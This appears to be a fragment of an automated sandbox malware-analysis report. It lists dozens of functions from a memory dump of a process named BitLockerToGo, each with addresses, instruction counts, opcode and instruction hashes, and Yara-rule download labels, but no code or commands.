                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9ce9a02da32156e9bc8ccf499f33a1afbd3e47572538140405c041fbab642647
                                                                                                                                                                                                                                      • Instruction ID: 1c02e0cc6625fb7faef98fc516fdb02ca24434078082eef6368c83bb3f0a6260
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ce9a02da32156e9bc8ccf499f33a1afbd3e47572538140405c041fbab642647
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D31F14800E2E049CB17473500A45A2BFE25CAF00D36ED5DED8D80E7A7C15BC65BEB66
                                                                                                                                                                                                                                      Function 0049A811 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6b4ef33017e6fa83298e64665b4ca251aaa2386f505dc7a0cae5457b643e3e12
                                                                                                                                                                                                                                      • Instruction ID: f0ce36e46fc52d9806c40754c96db6c979a2273983ac9e16af62465d3674d5b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4ef33017e6fa83298e64665b4ca251aaa2386f505dc7a0cae5457b643e3e12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B31ED4800E2E049CB1B873501A45A2BFE25DAF00D36ED5DED4D80E7A7C19BC65BEB76
                                                                                                                                                                                                                                      Function 004A43E1 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c9ae4ecde80d47ff1da9275454ff8824b193b074958249902c17aeb800eea470
                                                                                                                                                                                                                                      • Instruction ID: 22ffc687b24793956314ade20cbff44683298b94be8dfc7f94f6b2e1310446f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9ae4ecde80d47ff1da9275454ff8824b193b074958249902c17aeb800eea470
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2031044800E2E049CB17873500A45A2BFE25CAF00D3AED1DED4D80E7A7D19BC65FDB26
                                                                                                                                                                                                                                      Function 00483811 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0920181c1710660099f65dc8eff4533c3d8675de69f04d00c1f8c8d0adfe6d87
                                                                                                                                                                                                                                      • Instruction ID: 3f83c289c3fef26dc206258734cb25b81b692a4837144850c2ca3f43ac22758c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0920181c1710660099f65dc8eff4533c3d8675de69f04d00c1f8c8d0adfe6d87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF31FF4800E2E049CB1B473500A44A2BFE25CAF00D36ED5DED4D80E7A7C19BC65BEB76
                                                                                                                                                                                                                                      Function 004ADDE1 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 437082c8dfc8641a73d14df2ea4a57bea99a6c6a3f6bd353bef13fd57e892a86
                                                                                                                                                                                                                                      • Instruction ID: 28e522e3f14a3595ff7d2698da9526dbd31f3fee31f0e3244002fc4b3496993a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 437082c8dfc8641a73d14df2ea4a57bea99a6c6a3f6bd353bef13fd57e892a86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2231028800E2E048CB1B473500A45A2BFE25DAF01D37ED5DED4D80E7A7D19BC65BEB66
                                                                                                                                                                                                                                      Function 00498EF1 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: cfd3027a0f6ea8c3fc7d693c864a443f30d3935897125d8597dee091b2b0c261
                                                                                                                                                                                                                                      • Instruction ID: b6f54cb141a7ee00618967e9d2d1d507225c1be326ef8024cb1450dc165978c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfd3027a0f6ea8c3fc7d693c864a443f30d3935897125d8597dee091b2b0c261
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A731FC4800E2E049CB1B873501A44A2BFE25CAF00D36ED1DED4D80E7A7C19BC64BEB76
                                                                                                                                                                                                                                      Function 004A3F01 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3d92e047b7f82e4e5d7a58ff8478e73e025e617d113d1d09b16cb7f2bfa428b9
                                                                                                                                                                                                                                      • Instruction ID: 68673e8b7816002ebf13261977c1faff8b54f75231c3b575ea44f4dd0219e623
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d92e047b7f82e4e5d7a58ff8478e73e025e617d113d1d09b16cb7f2bfa428b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231FF4800E2E049CB1B873500A45A2BFE25CAF01D36ED5DED4D80E7A7D19BC65BEB76
                                                                                                                                                                                                                                      Function 0049E2B1 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9dbb9640fa2a9a331bf31bbfc48426b6dc90bb7b57a5ccc361ded99d3bb96355
                                                                                                                                                                                                                                      • Instruction ID: 4d124b38d646561056071f65f8fae2d80be6cce057204226bb9e60275ad824b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbb9640fa2a9a331bf31bbfc48426b6dc90bb7b57a5ccc361ded99d3bb96355
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7731F28800E2E049DB17473500A45A2BFE25CAF00D37ED5DED4D80E7A7D19BC65BEB26
                                                                                                                                                                                                                                      Function 004B0831 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8664c52e5f6dba7703b757b24ffa41b4e2c53ecc4182104214c98a60099eea45
                                                                                                                                                                                                                                      • Instruction ID: ba715ce5cf2602a41adede05cbbc49a9f0559e2dfe328e1b1730bb23a9aa1c28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8664c52e5f6dba7703b757b24ffa41b4e2c53ecc4182104214c98a60099eea45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6831ED4800E2E049CB1B4B3500A45A2BFE25CAF00D36ED5DED4D80E7A7C15BC64BEB36
                                                                                                                                                                                                                                      Function 004A0941 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4dfe860f78b95e0ff2ae6495e30e6c444c7a2c6bf11ded0d2f4d0219b3025adf
                                                                                                                                                                                                                                      • Instruction ID: d6f381533b86ca3f830f318d66394b5542042830fc096b3ab016e7707349cfc3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfe860f78b95e0ff2ae6495e30e6c444c7a2c6bf11ded0d2f4d0219b3025adf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131004800E2E049CB1B873501A45A2BFE25CAF00D36ED1DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 004A3B91 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e5893d5d59f61aed72f0ef0ac84f91851d5c93a2d020146e1ed4694ab7c6fd44
                                                                                                                                                                                                                                      • Instruction ID: 89196b3b33a3a7feeb1379ba5e05e3a561881d58503f6eb1d6d57a4231512901
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5893d5d59f61aed72f0ef0ac84f91851d5c93a2d020146e1ed4694ab7c6fd44
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B31EF4800E2E049CB1B877540A45A2BFE25CAF00D36ED5DED4D84E7A7C19BC65BEB26
                                                                                                                                                                                                                                      Function 0049BD71 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a0c24d6e33503778e87932608c9d1b767dcb96c43be2d9709d59ce9041e04a0e
                                                                                                                                                                                                                                      • Instruction ID: 1424f468fcb85b44d3403a6a50f525df882198d26b818aa19397adc1018e8b7a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0c24d6e33503778e87932608c9d1b767dcb96c43be2d9709d59ce9041e04a0e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3331044800E2E049CB17873500E45A2BFE25CAF00D36ED5DED4D84E7A7D19BC65BDB26
                                                                                                                                                                                                                                      Function 004ADD01 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5d293cf3f02c223f7a9cc0721b0c5a4ce595b6686fe28191f750796f6612032
                                                                                                                                                                                                                                      • Instruction ID: c35f1247a790b9c73afc36b5dad16c7e797e30a0f3eb43ce01bd613d07f2f5f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5d293cf3f02c223f7a9cc0721b0c5a4ce595b6686fe28191f750796f6612032
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B31048800E2E049CB17473500E45A2BFE25DAF00D36ED5DED4D84E7A7D19BC65BDB26
                                                                                                                                                                                                                                      Function 00499F71 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e31046f2c6d10ca274a8fe7d9a750afc35f7e6e831dd8623714c6978737c2afd
                                                                                                                                                                                                                                      • Instruction ID: 56dc80c6e060df44826ac082d330a0b4a0d83200919c1cb37f0a08b2c6106258
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e31046f2c6d10ca274a8fe7d9a750afc35f7e6e831dd8623714c6978737c2afd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931048800E2E049CB17873500E45A2BFE25DAF00D36ED5DED4D80E7A7D19BC65BDB26
                                                                                                                                                                                                                                      Function 004B0FF1 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f6b1a5ab06a88614ac6bf571d0801f6a9c0ab33c671d36953803960c22d8b7b5
                                                                                                                                                                                                                                      • Instruction ID: 91207cd4560978e36683cdd92de814678cfc4d224638dbff968d4ad848196243
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6b1a5ab06a88614ac6bf571d0801f6a9c0ab33c671d36953803960c22d8b7b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8631ED4800E2E049CB1B4B3500A45A2BFE25CAF00D36ED5DED4D80E7A7D15BC64BEB36
                                                                                                                                                                                                                                      Function 00499331 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b9400699b38bf4ff34bd26512b98f4cd67a7614ad7459fcdc323004317d6eb6e
                                                                                                                                                                                                                                      • Instruction ID: 3a5fed3c3978cc5ef449b2cc45aa021af463622c178d2f85d546171187cee62b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9400699b38bf4ff34bd26512b98f4cd67a7614ad7459fcdc323004317d6eb6e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7631038800E2E049CB17477500A45A2BFE25CAF00D36ED5DED4D84E3A7D19BC69BEB26
                                                                                                                                                                                                                                      Function 0049A741 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9ab8fb5c1944ec1e1cce9ec07d0290c80b6f325c2b106133a164419e27661c96
                                                                                                                                                                                                                                      • Instruction ID: bf2d8c457d854f5897a5e7cb96d06f99ae4a0ae0ca35c5372c6773c49b5b5e9d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab8fb5c1944ec1e1cce9ec07d0290c80b6f325c2b106133a164419e27661c96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131104800E2E049CB17873500A45A1BFE25DAF00D36ED5DED4D80E3A7D19BC65BDB26
                                                                                                                                                                                                                                      Function 00498811 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 22ce248c111240f77585fb8f218b612f37d48deaba3ecf6687d5c8f2e164e98b
                                                                                                                                                                                                                                      • Instruction ID: 669f1df038f4fac5540f6a794bb5b2f46a4b376fe41b55473478b1d3d343bdc3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22ce248c111240f77585fb8f218b612f37d48deaba3ecf6687d5c8f2e164e98b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7831EE4800E2E049CB1B473501A45A2BFE25CAF00D36ED5DED4E80E3A7D19BC69BDB36
                                                                                                                                                                                                                                      Function 004AE951 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0d935ebcca76306476d7aac5d3de4803b999b195042dd6f145cdd953fdeb483f
                                                                                                                                                                                                                                      • Instruction ID: 3a9b9335c6e6bba42239d4a1d897174ce52603225690a63abb283d51fa464167
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d935ebcca76306476d7aac5d3de4803b999b195042dd6f145cdd953fdeb483f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31154800E2E049CB17473504A45A1BFE25CAF00D36ED5DED4D84E7A7D15BC65BDB26
                                                                                                                                                                                                                                      Function 0049AA01 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 080bfdfdc15e816066fde48a7b9d36af2f0112e78575c1ee95e02fd19ac0bdd5
                                                                                                                                                                                                                                      • Instruction ID: f163a6af4e30c0756c23cc7c00e280f5df77a4097a091be81acbf5d91271bc51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 080bfdfdc15e816066fde48a7b9d36af2f0112e78575c1ee95e02fd19ac0bdd5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA31ED4800E2E049CB1B473501A45A2BFE25DAF00D36ED5DED4D80E7A7D19BC69BDB26
                                                                                                                                                                                                                                      Function 004B0A11 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b6ab8c0d891658960e47998301c7f69d2044826052504b31bf7c6a0500bdb19a
                                                                                                                                                                                                                                      • Instruction ID: 234bd8f5a4eb1012300dc67063ce81015b68b5e5f638be6de0b13dd26b709e47
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6ab8c0d891658960e47998301c7f69d2044826052504b31bf7c6a0500bdb19a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E031FF4800E2E049CB17877500A45A2BFE25DAF00D36ED5DED4D80E3A7D19BC69BEB76
                                                                                                                                                                                                                                      Function 004A3AC1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1728e3df26f6e684ba9816aaf420f98c681a2839d80c48723824024a5b98890f
                                                                                                                                                                                                                                      • Instruction ID: 7ee81d26a5964f65f59b2536f82baecd971dfb3b39d4105ac1d6301ce0e0b74b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1728e3df26f6e684ba9816aaf420f98c681a2839d80c48723824024a5b98890f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9931154800E2E049CB17473600A45A1BFE25CAF00D36ED5DED4D80E3A7D15BC65BDB26
                                                                                                                                                                                                                                      Function 004A0AA1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f0912dce42c1f4633142780b90c5888893f94bae0f022cfcd600f094b2023914
                                                                                                                                                                                                                                      • Instruction ID: 8f3d67f114b9bfd2e7e5ead186c2e7972ad9628aa91192092c7719f834a19128
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0912dce42c1f4633142780b90c5888893f94bae0f022cfcd600f094b2023914
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC31024800E2E049CB17877500A45A2BFE25CAF00D36ED5DED4E94E3A7D19BC69BDB26
                                                                                                                                                                                                                                      Function 004B0B31 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 82ed38aca11b76cf4fccf3af0ce723d360a8e8dc7c96183a4db6d8b0dd0ebe5b
                                                                                                                                                                                                                                      • Instruction ID: e0e02f17faad9c0112d0516c254c69c899d309e49c9beb4e6467a68f593678fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ed38aca11b76cf4fccf3af0ce723d360a8e8dc7c96183a4db6d8b0dd0ebe5b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E31ED4800E2E049CB1B473600A45A2BFE25CAF00D36ED5DED4D80E7A7D19BC64BDB36
                                                                                                                                                                                                                                      Function 00498C71 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
